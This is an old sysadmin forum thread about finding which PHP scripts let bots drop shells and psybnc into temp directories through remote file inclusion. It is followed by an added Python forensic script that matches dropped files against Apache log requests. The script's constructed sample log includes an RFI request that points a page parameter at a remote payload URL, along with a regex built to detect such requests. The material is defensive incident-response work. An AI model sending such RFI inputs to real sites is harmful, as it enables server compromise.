  1. #1 (Jul 2009)

    Tracking down source of bots with user nobody

    I have a multiuser server that has Apache running as nobody and bots using RFI exploits to drop PHP shells. The shells are being used to drop psybnc and other crap in /dev/shm, /tmp and /var/tmp (all as user nobody). Given the size of this server, it's very difficult to find their PHP shells because the names are always different and find is too slow. I need to find what PHP script is creating the bots in the temporary directories. We have installed suPHP on some servers, which helps to locate the users' webroots, but not always the files. They create the files and close the write streams fast enough that I can't lsof them to find their creator.

    Any creative solutions?

  2. #2 Rubberman (Linux Guru, Apr 2009)
    Taking this bass-ackward, aren't we? First, sandbox your web server (chroot its file system) and lock down system directories and files. Change the root password, and use SELinux and high-security encryption for system passwords. Take this server off-line until it is locked down and scrubbed of infected web pages.
    Sometimes, real fast is almost as good as real time.
    Just remember, Semper Gumbi - always be flexible!

  3. #3 (Jul 2009)
    The server runs cPanel, which, so far as I know, doesn't support chrooting at the moment. The root password is changed frequently; they haven't gained root. SELinux isn't a viable option, unfortunately. I can't take the server offline because there are about 300 users.

    We have lots of ways to prevent the shells from dropping, but given the volume of accounts it will still occur no matter what measures we take. The problem I'm really having is finding the root source. Is there any hackish way to log all PHP execution commands?

  4. #4 (Jul 2009)
    I'm able to find most r57 and c99 shells through the Apache logs, but I'm still having trouble finding the obscure ones.
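The thread never gets a concrete answer to the OP's question, so here is one way to attack the "which PHP script dropped this file" problem from the evidence the OP says he already has: the Apache access log and the dropped files in /dev/shm, /tmp and /var/tmp. This is an added example, not code from the thread or from cPanel/suPHP. It assumes the Apache "combined" log format, that the drop time comes from stat on the dropped file, and that the request which dropped the file was received shortly before the file appeared. The log lines, the dropped-file path and its timestamp below are all constructed for the example.

```python
"""Correlate dropper files in temp dirs with Apache access-log requests.

Added example for the thread above (not the OP's or cPanel's code).
Assumptions: Apache 'combined' log format; drop times taken from stat;
the dropping request was received within `window` seconds before the
file appeared. Sample log and file data are constructed."""
import re
from collections import namedtuple
from datetime import datetime

# Apache 'combined' format: host ident user [time] "req" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Classic RFI signature: a query parameter whose value is a remote URL
RFI_RE = re.compile(r'[?&][^=&]+=(?:https?|ftp)://', re.IGNORECASE)

Request = namedtuple('Request', 'ts ip method url status')


def ts_of(apache_time):
    """'14/Jul/2009:03:12:09 +0000' -> epoch seconds (timezone-aware)."""
    return datetime.strptime(apache_time, '%d/%b/%Y:%H:%M:%S %z').timestamp()


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return Request(ts_of(m.group('time')), m.group('ip'), m.group('method'),
                   m.group('url'), int(m.group('status')))


def script_path(url):
    return url.split('?', 1)[0]


def looks_like_rfi(url):
    return bool(RFI_RE.search(url))


def candidates(requests, drop_ts, window=30):
    """PHP requests received in [drop_ts - window, drop_ts], most suspicious first.

    Scoring is deliberately simple: an RFI-looking query string is the
    strongest signal, then a POST (shells are usually driven by POST),
    then a 200 (the script actually ran)."""
    hits = []
    for r in requests:
        if not script_path(r.url).lower().endswith('.php'):
            continue
        if not (drop_ts - window <= r.ts <= drop_ts):
            continue
        score = 0
        if looks_like_rfi(r.url):
            score += 3
        if r.method == 'POST':
            score += 1
        if r.status == 200:
            score += 1
        hits.append((score, r))
    hits.sort(key=lambda h: (-h[0], h[1].ts))
    return hits


def hunt(log_text, dropped_files, window=30):
    """Map each dropped file to its ranked list of (score, Request)."""
    requests = [r for r in map(parse_line, log_text.splitlines()) if r]
    return {path: candidates(requests, ts, window) for path, ts in dropped_files.items()}


# Constructed sample data: one RFI hit against a user's gallery script,
# a follow-up POST to the dropped shell, and unrelated traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jul/2009:03:12:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jul/2009:03:12:04 +0000] "GET /~alice/gallery/view.php?page=http://203.0.113.7/x.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
10.0.0.9 - - [14/Jul/2009:03:12:07 +0000] "POST /~alice/gallery/images/.cache.php HTTP/1.1" 200 44 "-" "libwww-perl/5.805"
10.0.0.22 - - [14/Jul/2009:03:12:08 +0000] "GET /~bob/css/style.css HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jul/2009:03:14:30 +0000] "GET /~bob/blog/index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""
# Constructed: path and stat time of a file found in /dev/shm as user nobody.
DROPPED_FILES = {'/dev/shm/.x/psybnc': ts_of('14/Jul/2009:03:12:09 +0000')}

if __name__ == '__main__':
    for path, hits in hunt(SAMPLE_LOG, DROPPED_FILES).items():
        print(path)
        for score, r in hits:
            flag = ' RFI' if looks_like_rfi(r.url) else ''
            print(f'  [{score}] {r.ip} {r.method} {r.url}{flag}')
```

Two practical caveats when running this on a real box: feed it ctime (stat -c %Z) rather than mtime, since a shell running as nobody can touch the mtime of its own drop but not the ctime; and remember that the request which spawned psybnc may still be open when the file appears, so widen the window if the first pass finds nothing. Once a candidate script surfaces, the suPHP log or the file's owner tells you whose account to clean.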
